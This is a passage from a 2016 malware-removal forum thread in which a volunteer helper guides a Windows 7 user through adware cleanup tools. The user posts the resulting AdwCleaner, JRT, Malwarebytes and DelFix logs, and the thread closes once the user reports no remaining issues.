==================== End of Addition.txt ============================

#6
zep516

Posted 01 December 2016 - 01:59 PM

Trusted Helper

Malware Removal
8,093 posts

Please uninstall Adobe way out of date. We'll install a fresh version later. Old versions of Adobe are risky.
Adobe Reader 9.5.5 MUI

Next

Please download adwCleaner to your desktop.

Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Click the logfile button and the log will open in Notepad.
Click on the Clean button follow the prompts.
A log file will automatically open after the scan has finished and the PC has rebooted.
Please post the content of that log file with your next answer.
The report will be saved in the C:\AdwCleaner folder.

Next

Please download Junkware Removal Tool to your Desktop.
Please close your security software to avoid potential conflicts. See Here how to disable you security protection (Anti Virus)
Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete, depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
Please post the contents of JRT.txt into your reply.

Next Malwarebytes scan.

Right click and choose "Run as administrator" to open Malwarebytes Anti-Malware and from the Dashboard please Check for Updates by clicking the Update Now... link
Open up Malwarebytes > Settings > Detection and Protection > Enable Scan for rootkit and Under Non Malware Protection set both PUP and PUM to Treat detection's as malware.
Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.
Once completed please click on the History > Application Logs and find your scan log and open it and then click on the "copy to clipboard" button and post back the results on your next reply.

In your next reply post;
The AdwCleaner [C1].txt Log
The JRT.txt Log
Malwarebytes log

#7
dreamtime

Posted 01 December 2016 - 07:30 PM

New Member

Topic Starter
Member
6 posts

Here are the logs.

# AdwCleaner v6.030 - Logfile created 01/12/2016 at 19:32:17
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-12-01.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : Owner - OWNER-HP
# Running from : C:\Users\Owner\Desktop\adwcleaner_6.030.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support

***** [ Services ] *****

***** [ Folders ] *****

[-] Folder deleted: C:\Users\Owner\AppData\Local\PackageAware
[-] Folder deleted: C:\Users\Owner\AppData\Local\unitlayers
[-] Folder deleted: C:\Users\Owner\AppData\Local\YSearchUtil
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\iWin
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\WebCake
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\iWin.com Games
[-] Folder deleted: C:\Program Files\Earth Networks
[-] Folder deleted: C:\Users\Owner\AppData\Local\VirtualStore\Program Files (x86)\Trymedia
[-] Folder deleted: C:\ProgramData\Free Ride Games
[-] Folder deleted: C:\ProgramData\GamesBar
[-] Folder deleted: C:\ProgramData\Trymedia
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Free Ride Games
[#] Folder deleted on reboot: C:\ProgramData\Application Data\GamesBar
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Trymedia
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GamesBar
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin.com Games
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WeatherBug®
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
[-] Folder deleted: C:\Program Files (x86)\Coupons
[-] Folder deleted: C:\Program Files (x86)\GamesBar
[-] Folder deleted: C:\Program Files (x86)\iWin
[-] Folder deleted: C:\Program Files (x86)\iWin.com Games
[-] Folder deleted: C:\Program Files (x86)\Trymedia
[-] Folder deleted: C:\Program Files (x86)\WebCake
[-] Folder deleted: C:\Program Files (x86)\Yahoo!\yset
[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil

***** [ Files ] *****

[-] File deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\WeatherBug®.lnk
[-] File deleted: C:\Users\Owner\Desktop\WeatherBug®.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk

***** [ DLL ] *****

***** [ WMI ] *****

***** [ Shortcuts ] *****

***** [ Scheduled Tasks ] *****

***** [ Registry ] *****

[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WebCakeUpdaterService
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WebCakeUpdaterService
[-] Key deleted: HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Oberontb.Band
[-] Key deleted: HKLM\SOFTWARE\Classes\Oberontb.Band.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Oberontb.Band
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Oberontb.Band.1
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{B302A1BD-0157-49FA-90F1-4E94F22C7B4B}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{FB684D26-01F4-4D9D-87CB-F486BEBA56DC}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{AD76633E-E50D-4844-9E7F-4DFBC7C18467}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1A93C934-025B-4C3A-B38E-9654A7003239}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{1A93C934-025B-4C3A-B38E-9654A7003239}
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\.DEFAULT\Software\ImInstaller
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\gamesbar
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\ImInstaller
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Earth Networks
[#] Key deleted on reboot: HKU\S-1-5-18\Software\ImInstaller
[#] Key deleted on reboot: HKCU\Software\gamesbar
[#] Key deleted on reboot: HKCU\Software\ImInstaller
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\Earth Networks
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-18\Software\Updater By Sweetpacks
[-] Key deleted: HKLM\SOFTWARE\Conduit
[-] Key deleted: HKLM\SOFTWARE\gamesbar
[-] Key deleted: HKLM\SOFTWARE\GamesBarSetup
[-] Key deleted: HKLM\SOFTWARE\Trymedia Systems
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gamesbar
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! SearchSet
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WeatherBug®
[#] Key deleted on reboot: [x64] HKCU\Software\gamesbar
[#] Key deleted on reboot: [x64] HKCU\Software\ImInstaller
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: [x64] HKCU\Software\Earth Networks
[-] Key deleted: [x64] HKLM\SOFTWARE\Tarma Installer
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02F47BF73B948514FAACADD8CBBDF37D
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\080D9F5E1E95FEE4794CE438E635239E
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1E264E0A5959A1C46BA9175A878B12EA
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E6768B6932D112438F047C54D180635
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\351716A953E21214898904032EAE2E81
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\397C771A7BCAC904697C3EC629ED33ED
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\69D6A6B2ED56AF24EA6335EAD6E91CA4
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7FFA128C2B0FF414D805FC5627883401
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\86EDC790504E1834DBC20C9A04328FD2
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\97C3D0F82E712E241A2F969F45E3351C
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\98CC8BF5A4A6E6C4ABF7051DDAB8B058
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E7F556BF224D804D96A96F0F6344789
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A189D17A469616C4688D23E192996267
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF4F885EDEE45644EB1E0C99E0162399
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CE21F3FD57B244142880EF15A165A156
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D15DAF33C220F91468A1D7D57C31ACD7
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D3BA76A44C779424889063D5098ED2D6
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D6D0EB9FDBD90C04D92A7E729058F10D
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E4748F9A4181FCE46A23C13B517B9420
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Value deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\Extension.DLL
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [WeatherBug.exe]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext [DisableAddonLoadTimePerformanceNotifications]

***** [ Web browsers ] *****

[-] [C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com

*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [10240 Bytes] - [01/12/2016 19:32:17]
C:\AdwCleaner\AdwCleaner[S0].txt - [9894 Bytes] - [01/12/2016 19:27:21]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [10387 Bytes] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Home Premium x64
Ran by Owner (Administrator) on Thu 12/01/2016 at 19:43:26.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 12

Successfully deleted: C:\Windows\couponprinter.ocx (File)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\351ESB0Y (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWM65HT1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIM9VYU9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z9QB78JH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\351ESB0Y (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWM65HT1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIM9VYU9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z9QB78JH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\SysWOW64\sho2A0D.tmp (File)
Successfully deleted: C:\Windows\SysWOW64\sho85E4.tmp (File)
Successfully deleted: C:\Windows\SysWOW64\shoE254.tmp (File)

Registry: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 12/01/2016 at 19:51:00.25
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/1/2016
Scan Time: 7:55 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.12.02.01
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Owner

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 324871
Time Elapsed: 24 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 7
Adware.TryMedia, C:\Users\Owner\Desktop\JewelQuestSolitaire3-dm.exe, Quarantined, [7217a63c722801353124b689e31e14ec],
PUP.Optional.OpenCandy, C:\Users\Owner\Desktop\tm-Installer_JewelQuestMysteries.exe, Quarantined, [9ced6f73702a67cf964653dc808345bb],
PUP.Optional.OpenCandy, C:\Users\Owner\Desktop\tm-Installer_SlingoSupreme.exe, Quarantined, [4b3ec61c5e3c6ccac5177eb12bd8a55b],
Adware.TryMedia, C:\Users\Owner\Downloads\Spin_and_Win-v102-dm.exe, Quarantined, [dfaa2eb45f3bf145f2d191a7fe035ca4],
Adware.TryMedia, C:\Users\Owner\Downloads\PuzzleSolitaire-dm.exe, Quarantined, [aadffae8c2d888ae21a27cbcf60b8878],
PUP.Optional.OpenCandy, C:\Users\Owner\Downloads\tm-Installer_AARiddleoftheTwoKnights.exe, Quarantined, [6f1ab2301684be7837a549e650b318e8],
Adware.TryMedia, C:\Users\Owner\Desktop\Games\PuzzleSolitaire-dm.exe, Quarantined, [d0b98d55b3e74cea66ef053a9d649d63],

Physical Sectors: 0
(No malicious items detected)

(end)

#8
zep516

Posted 01 December 2016 - 08:08 PM

Trusted Helper

Malware Removal
8,093 posts

Hello,

Please uninstall OLD version of Java
Java 8 Update 65

What issues remain ?

#9
dreamtime

Posted 04 December 2016 - 12:21 PM

New Member

Topic Starter
Member
6 posts

I've uninstalled the old Java. From what I can tell, there doesn't seem to be any more issues.

#10
zep516

Posted 04 December 2016 - 12:24 PM

Trusted Helper

Malware Removal
8,093 posts

Hello,

If there are no further issues,

We need to remove the tools we used and then close the topic.

The following procedures will implement some cleanup procedures to remove these tools. It will also reset your System Restore by flushing out previous restore points and create a new restore point. It will also remove all the backups our tools may have made.
Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).

Why we need to remove some of our tools:
Some of the tools we have used to clean your computer were made by fellow malware fighters and are very powerful and if used incorrectly or at the wronge time can make the computer an expensive paper weight. They are updated all the time and some of them more than once a day so by the time you are ready to use them again they will already be outdated.

Download DelFix by Xplode and save it to your desktop.

Run the tool by right click on the icon and Run as administrator option.
Make sure that these ones are checked:
- Remove disinfection tools
- Purge system restore
- Reset system settings
Push Run.
The program will run for a few seconds and display a notepad report.
Paste it for my review.

#11
dreamtime

Posted 04 December 2016 - 01:04 PM

New Member

Topic Starter
Member
6 posts

Okay, here you go.

# DelFix v1.013 - Logfile created 04/12/2016 at 14:01:37
# Updated 17/04/2016 by Xplode
# Username : Owner - OWNER-HP
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Owner\Desktop\FRST-OlderVersion
Deleted : C:\log.txt
Deleted : C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
Deleted : C:\Users\Owner\Desktop\Addition.txt
Deleted : C:\Users\Owner\Desktop\adwcleaner_6.040(1).exe
Deleted : C:\Users\Owner\Desktop\FRST.txt
Deleted : C:\Users\Owner\Desktop\FRST64.exe
Deleted : C:\Users\Owner\Desktop\JRT.exe
Deleted : C:\Users\Owner\Desktop\JRT.txt
Deleted : C:\Users\Owner\Downloads\adwcleaner_6.040.exe
Deleted : C:\Users\Owner\Downloads\tdsskiller.exe

~ Cleaning system restore ...

Deleted : RP #133 [Installed HP Support Assistant | 11/25/2016 22:41:05]
Deleted : RP #134 [Windows Modules Installer | 11/25/2016 23:46:00]
Deleted : RP #135 [Windows Modules Installer | 11/26/2016 09:54:50]
Deleted : RP #136 [Windows Modules Installer | 11/26/2016 09:56:47]
Deleted : RP #137 [Windows Update | 11/26/2016 09:59:57]
Deleted : RP #139 [Restore Point Created by FRST | 11/30/2016 20:09:48]
Deleted : RP #140 [Removed Adobe Reader 9.5.5 MUI. | 12/02/2016 00:16:43]
Deleted : RP #141 [JRT Pre-Junkware Removal | 12/02/2016 00:43:33]
Deleted : RP #142 [Removed Java 8 Update 65 | 12/04/2016 18:05:13]
Deleted : RP #143 [Removed Java 8 Update 65 | 12/04/2016 18:08:23]
Deleted : RP #144 [Restore Operation | 12/04/2016 18:25:21]
Deleted : RP #145 [JRT Pre-Junkware Removal | 12/04/2016 18:47:07]
Deleted : RP #146 [Removed Java 8 Update 65 | 12/04/2016 18:55:52]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########

#12
zep516

Posted 04 December 2016 - 01:06 PM

Trusted Helper

Malware Removal
8,093 posts

Well done !

You usually get infected because your security settings are too low.

Here are a number of recommendations that will help tighten them, and which will contribute to making you a less likely victim:

Safe Computing Practices please read Here

Since this issue appears to be resolved ... this Topic has been closed. Glad we could help.

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a New Topic.

Thanks
Joe

Back to Virus, Spyware, Malware Removal · Next Unread Topic →

Also tagged with one or more of these keywords: rootkit, trojan

Security → Virus, Spyware, Malware Removal → Trojan Backdoor activity 578 Started by spotted jaguar , 15 Oct 2022 trojan, backdoor, 578	1 reply 1,937 views	RKinner 15 Oct 2022
Security → Virus, Spyware, Malware Removal → RAT remain after formatting [Closed] Started by mimogg , 22 Jan 2022 rootkit 1 2	Hot 28 replies 3,662 views	DR M 23 Jan 2022
Security → Virus, Spyware, Malware Removal → Is My PC Infected? [Solved] Started by siroynthe , 09 Apr 2021 infection, virus, trojan, rat and 1 more...	2 replies 4,400 views	DR M 12 Apr 2021
trojan Security → Virus, Spyware, Malware Removal → Trojan.kotver!bat Started by cstolarik , 05 Aug 2020 trojan	2 replies 2,411 views	paws 06 Aug 2020
Security → Virus, Spyware, Malware Removal → Win64:TrojanX-gen and other things.... Started by Matias Cooke , 04 Aug 2020 #virus, #trojan, #slow 1 2	Hot 19 replies 12,371 views	Matias Cooke 18 Aug 2020